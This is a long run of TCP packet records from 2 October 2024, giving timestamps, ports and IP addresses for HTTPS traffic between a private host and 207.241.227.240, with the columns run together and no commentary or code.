                                                                                    Oct 2, 2024 05:23:13.537796021 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.537890911 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.537905931 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.537944078 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.553467035 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.553491116 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.553567886 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.553576946 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.553627014 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.553807974 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.553824902 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.553868055 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.553875923 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.553905010 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.553926945 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.619180918 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.619214058 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.619374037 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.619419098 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.619482040 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.619986057 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.620002985 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.620091915 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.620112896 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.620160103 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.621284962 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.621301889 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.621404886 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.621428013 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.621486902 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.621771097 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.621787071 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.621870995 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.621880054 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.621920109 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.622378111 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.622392893 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.622476101 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.622488022 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.622531891 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.628549099 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.628571033 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.628649950 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.628681898 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.628700972 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.628712893 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.644001961 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.644026041 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.644087076 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.644118071 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.644135952 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.644161940 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.644349098 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.644365072 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.644423962 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.644433022 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.644468069 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.709933996 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.709966898 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.710103989 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.710144043 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.710187912 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.710783958 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.710808039 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.710854053 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.710867882 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.710885048 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.710901976 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.712089062 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.712111950 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.712174892 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.712199926 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.712249994 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.712505102 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.712532997 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.712578058 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.712585926 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.712599039 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.712624073 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.713124037 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.713145018 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.713190079 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.713200092 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.713227987 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.713238001 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.719209909 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.719229937 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.719306946 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.719332933 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.719382048 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.734880924 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.734908104 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.734986067 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.735018969 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.735059023 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.735313892 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.735332012 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.735410929 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.735419989 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.735461950 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.800820112 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.800853968 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.800976992 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.801007032 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.801054001 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.801320076 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.801338911 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.801403046 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.801414967 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.801460028 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.802808046 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.802828074 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.802885056 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.802896023 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.802947044 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.803330898 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.803349018 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.803427935 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.803433895 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.803492069 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.803858042 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.803877115 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.803925991 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.803932905 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.803968906 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.809814930 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.809834957 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.809890985 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.809904099 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.809942007 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.825544119 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.825562000 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.825705051 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.825742006 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.825788021 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.825908899 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.825928926 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.825978994 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.825985909 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.826035976 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.891912937 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.891933918 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.891977072 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.892024040 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.892031908 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.892055035 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.892076969 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.893441916 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.893457890 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.893529892 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.893547058 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.893908978 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.893928051 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.893997908 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.894006968 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.894435883 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.894450903 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.894510984 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.894520044 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.900528908 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.900549889 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.900614977 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.900624990 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.916165113 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.916181087 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.916306019 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.916330099 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.916605949 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.916625023 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.916671991 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.916681051 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.916692972 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.966514111 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.982160091 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.982177973 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.982266903 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.982283115 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.982321978 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.982615948 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.982633114 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.982686043 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.982692957 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.982731104 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.984152079 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.984168053 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.984230995 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.984241009 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.984277010 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.984610081 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.984627008 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.984673977 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.984680891 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.984714985 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.985157013 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.985172987 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.985219955 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.985227108 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.985260963 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.991328955 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.991345882 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.991401911 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:13.991409063 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:13.991441011 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.007090092 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.007107973 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.007193089 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.007209063 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.007241964 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.007447004 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.007463932 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.007515907 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.007524014 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.007561922 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.072953939 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.072976112 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.073224068 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.073282957 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.073352098 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.073364019 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.073373079 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.073386908 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.073498011 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.074805021 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.074820995 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.074949980 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.074959993 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.075042963 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.075237036 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.075252056 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.075367928 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.075375080 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.075494051 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.075896978 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.075913906 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.075979948 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.075987101 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.076031923 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.082185030 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.082205057 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.082356930 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.082412958 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.082461119 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.097811937 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.097836018 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.097898006 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.097927094 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.097971916 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.098150015 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.098167896 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.098222017 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.098231077 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.098278999 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.163707018 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.163727045 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.163917065 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.163954973 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.164037943 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.164062977 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.164079905 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.164124966 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.164134026 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.164169073 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.165925026 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.165942907 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.166066885 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.166096926 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.166165113 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.166399002 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.166416883 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.166464090 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.166476965 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.166491985 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.166512012 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.166625977 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.166641951 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.166692019 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.166699886 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.166739941 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.172991037 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.173010111 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.173106909 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.173127890 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.173170090 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.188640118 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.188657999 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.188770056 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.188810110 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.188827991 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.188854933 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.188968897 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.188988924 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.189037085 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.189045906 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.189084053 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.254420996 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.254439116 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.254594088 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.254635096 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.254683018 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.254786015 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.254801035 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.254852057 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.254861116 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.254909992 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.256406069 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.256422997 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.256477118 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.256484985 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.256530046 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.256966114 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.256983995 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.257045984 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.257070065 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.257136106 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.257309914 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.257325888 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.257378101 CEST49702443192.168.2.10207.241.227.240
                                                                                    Oct 2, 2024 05:23:14.257385969 CEST44349702207.241.227.240192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.257421970 CEST49702443192.168.2.10207.241.227.240
